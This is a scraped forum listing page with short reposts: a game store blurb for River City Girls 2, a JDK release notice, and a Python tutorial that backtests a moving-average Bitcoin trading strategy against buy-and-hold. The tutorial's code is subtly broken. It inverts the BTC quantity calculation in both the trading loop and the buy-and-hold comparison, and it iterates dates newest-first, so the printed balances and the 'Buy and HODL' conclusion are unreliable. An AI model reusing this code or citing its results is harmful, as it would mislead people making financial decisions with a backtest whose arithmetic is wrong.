href="https://www.gamespot.com/articles/fortnite-falcon-scout-explained-and-how-to-get-it/1100-6510653/?ftag=CAD-01-10abi2f/">Continue Reading at GameSpot</a>
https://www.gamespot.com/articles/fortni...01-10abi2f
|
|
|
|
| PC - River City Girls 2 |
|
Posted by: xSicKxBot - 01-19-2023, 04:29 AM - Forum: New Game Releases
- No Replies
|
|
River City Girls 2
The River City Girls are ready for round 2! When an old foe resurfaces, Misako, Kyoko, Kunio, and Riki - joined by newcomers Marian and Provie - hit the streets for an all-new beat-'em-up adventure packed with new abilities, enemies, environments, and more!
Team up for local or online co-op, then pound punks into the dirt with brand-new guard-crush attacks, lift-off combos, double-team maneuvers, and other knuckle-busting techniques!
Level-up to earn new moves, buy items and accessories in more than 30 shops, and recruit defeated foes and hired heavies to help you on your way!
River City is bigger than ever, with more locations to explore, more objects to destroy, and a day-night cycle! With nonlinear gameplay, a dynamic story system, and another epic soundtrack by Megan McDuffee, River City Girls 2 will keep you brawling until all your enemies yell "BARF!"<p>Publisher: Arc System Works<p>Release Date: Dec 14, 2022
https://www.metacritic.com/game/pc/river-city-girls-2
|
|
|
|
| [Oracle Blog] JDK 16.0.2, 11.0.12, 8u301, and 7u311 Have Been Released! |
|
Posted by: xSicKxBot - 01-18-2023, 06:08 AM - Forum: Java Language, JVM, and the JRE
- No Replies
|
|
JDK 16.0.2, 11.0.12, 8u301, and 7u311 Have Been Released!
The Java SE 16.0.2, 11.0.12, 8u301, and 7u311 update releases are now available. You can download these latest JDK releases from the Java SE Downloads page. OpenJDK 16.0.2 is also available on http://jdk.java.net/16/. New Features, Changes, and Notable Bug Fixes For information about the new feature...
https://blogs.oracle.com/java/post/jdk-1...n-released
|
|
|
|
| [Tut] Bitcoin – Trading Moving Averages or HODL? A Python Script Uncovers the Answer! |
|
Posted by: xSicKxBot - 01-18-2023, 06:08 AM - Forum: Python
- No Replies
|
|
Bitcoin – Trading Moving Averages or HODL? A Python Script Uncovers the Answer!
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1065786","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<p>I’ve always wondered if a slow and high-level trading strategy focusing on long-term trends could outperform a buy-and-hold strategy.</p>
<p>To answer this question, I created a Python script that would utilize a momentum-based strategy to tell me when to buy and when to sell Bitcoin. </p>
<p>Despite my busy life and doubts that day trading would be a successful venture, I was eager to find out if this simple program could beat the market. I can run the Python code daily to decide whether to buy or sell BTC. </p>
<p class="has-base-background-color has-background"><strong>What would have happened if I had used the following strategy between the turbulent years 2020 and 2022 in Bitcoin?</strong> Read on to find out! <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f447.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<h2>General Idea</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="495" height="881" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-165.png" alt="" class="wp-image-1066579" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-165.png 495w, https://blog.finxter.com/wp-content/uplo...69x300.png 169w" sizes="(max-width: 495px) 100vw, 495px" /></figure>
</div>
<p>The idea of this algorithm is to allow traders to automate their Bitcoin trading decisions using two moving averages. </p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Finxter Academy</strong>: <a href="https://academy.finxter.com/course/setting-up-binance-and-development-environment-3/" data-type="URL" data-id="https://academy.finxter.com/course/setting-up-binance-and-development-environment-3/" target="_blank" rel="noreferrer noopener">Complete Python Trading Course (Binance) — Simple Moving Average</a></p>
<p>The algorithm will enter buy positions when the shorter-term moving average (<code>MA1</code>) is higher than the longer-term moving average (<code>MA2</code>) indicating a positive momentum of the Bitcoin price, and enter sell positions when the shorter-term moving average is lower than the longer-term moving average indicating a negative momentum of the Bitcoin price. </p>
<p>When the moving averages cross, the algorithm will close any existing positions and reverse the trading direction.</p>
<h2>Algorithm Steps</h2>
<figure class="wp-block-image size-large"><img decoding="async" loading="lazy" width="1024" height="683" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-166-1024x683.png" alt="" class="wp-image-1066580" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-166-1024x683.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-166.png 1113w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>My strategy follows these simple steps:</p>
<ol>
<li>Initialize two moving averages, <code>MA1</code> and <code>MA2</code>, with different lookback periods.</li>
<li>Calculate the current value of each moving average.</li>
<li>If <code>MA1 > MA2</code>, enter a buy position in the Bitcoin market.</li>
<li>If <code>MA1 < MA2</code>, enter a sell position in the Bitcoin market.</li>
<li>Monitor the market for any changes in the moving averages.</li>
<li>When the moving averages cross, close any existing positions and reverse the trading direction (buy if previously selling, sell if previously buying).</li>
<li>Repeat steps 2 to 6.</li>
</ol>
<h2>Python Program to Automate It</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-167-1024x684.png" alt="" class="wp-image-1066593" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-167-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-167.png 1113w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>The following program implements these steps in practice by pulling the Bitcoin price data from an online API, calculating the moving averages (short- and long-term), and trading based on whether the short-term MA is below or above the long-term MA. </p>
<p>I’ll explain the code in a minute!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import requests # Get Bitcoin Price Data
URL = 'https://www.alphavantage.co/query?function=DIGITAL_CURRENCY_DAILY&symbol=BTC&market=USD&apikey=APIKEY'
response = requests.get(URL) data = response.json() daily_data = data["Time Series (Digital Currency Daily)"] # Convert JSON to DataFrame
df = pd.DataFrame(daily_data)
df = df.T # Create two Moving Averages
MA1 = 20
MA2 = 50
df['MA1'] = df['1a. open (USD)'].rolling(MA1).mean()
df['MA2'] = df['1a. open (USD)'].rolling(MA2).mean() # Initialize variables
position = 0
my_usd = 10000
my_btc = 0 print('Initial balance:', str(my_usd), 'USD') # Backtest Algorithm
for i in range(len(df)): # Get price price = float(df['1a. open (USD)'].iloc[i]) # Buy position if df['MA1'].iloc[i] > df['MA2'].iloc[i] and position == 0: position = 1 my_btc = price / my_usd my_usd = 0 print('Buying at', price, 'on', df.index[i]) # Sell position elif df['MA1'].iloc[i] < df['MA2'].iloc[i] and position == 1: position = 0 my_usd = price * my_btc my_btc = 0 print('Selling at', price, 'on', df.index[i]) print('Final balance:', str(my_usd + my_btc * price)) initial_btc = float(df['1a. open (USD)'].iloc[0]) / 10000
value_today = initial_btc * float(df['1a. open (USD)'].iloc[-1])
print('Final balance (buy and hold):', str(value_today))
</pre>
<h2>Code Explanation</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-168-1024x684.png" alt="" class="wp-image-1066595" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-168-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-168.png 1113w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>This code implements the algorithm described above. </p>
<p>The first portion of the code is getting the daily Bitcoin price data from the API and converting it into a <a href="https://blog.finxter.com/how-to-create-a-dataframe-in-pandas/" data-type="post" data-id="16764" target="_blank" rel="noreferrer noopener">DataFrame</a>. </p>
<p>Next, the code creates two moving averages, <code>MA1</code> and <code>MA2</code>, based on the open price of Bitcoin. Then, the code initializes the position variable to 0.</p>
<p>The backtest algorithm then runs a loop to iterate through the DataFrame to identify when conditions are met to buy or sell. If the shorter-term <code>MA1</code> is higher than the longer-term <code>MA2</code>, the code will enter a buy position. </p>
<p>Similarly, if the shorter-term <code>MA1</code> is lower than the longer-term <code>MA2</code>, the code will enter a sell position. We don’t assume short selling so “selling” on an empty position just means waiting for the next buy opportunity.</p>
<p>Finally, if the <code>MA1</code> and <code>MA2</code> cross, the code will close any existing position and reverse the trading direction.</p>
<h2>Backtesting the Strategy</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="587" height="881" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-169.png" alt="" class="wp-image-1066596" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-169.png 587w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 587px) 100vw, 587px" /></figure>
</div>
<p>Let’s have a look at an example run — note to read this from bottom to top! <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f447.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="1,22,23" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Initial balance: 10000 USD
Buying at 20905.58 on 2022-11-07
Selling at 18809.13 on 2022-09-26
Buying at 21826.87 on 2022-09-12
Selling at 19331.28 on 2022-07-13
Buying at 28424.71 on 2022-06-12
Selling at 41941.7 on 2022-03-10
Buying at 42380.87 on 2022-02-07
Selling at 36660.35 on 2022-01-25
Buying at 41566.48 on 2022-01-08
Selling at 57471.35 on 2021-10-12
Buying at 47674.01 on 2021-08-25
Selling at 44572.54 on 2021-08-08
Buying at 40516.28 on 2021-06-15
Selling at 57351.56 on 2021-03-22
Buying at 57641.0 on 2021-03-19
Selling at 56900.74 on 2021-03-17
Buying at 11318.42 on 2020-08-26
Selling at 9538.1 on 2020-07-25
Buying at 9772.44 on 2020-06-10
Selling at 9315.96 on 2020-05-16
Final balance: 14806.674822101442
Final balance (buy and hold): 15095.029852800002</pre>
<p>So, you see, in the period between May 2020 and November 2022, trading wouldn’t have been more profitable than simply buying and holding Bitcoin — even when ignoring trading fees and higher tax burden. </p>
<p>And ignoring the fact that Bitcoin has had huge up and down volatility, which should be great for trading. That is — in theory.</p>
<h2>Conclusion</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="711" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-170-1024x711.png" alt="" class="wp-image-1066604" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-170-1024x711.png 1024w, https://blog.finxter.com/wp-content/uplo...00x208.png 300w, https://blog.finxter.com/wp-content/uplo...68x533.png 768w, https://blog.finxter.com/wp-content/uplo...ge-170.png 1113w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<div style="height:45px" aria-hidden="true" class="wp-block-spacer"></div>
<p>Buy and HODL!</p>
</div>
https://www.sickgaming.net/blog/2023/01/...he-answer/
|
|
|
|
|
|
|
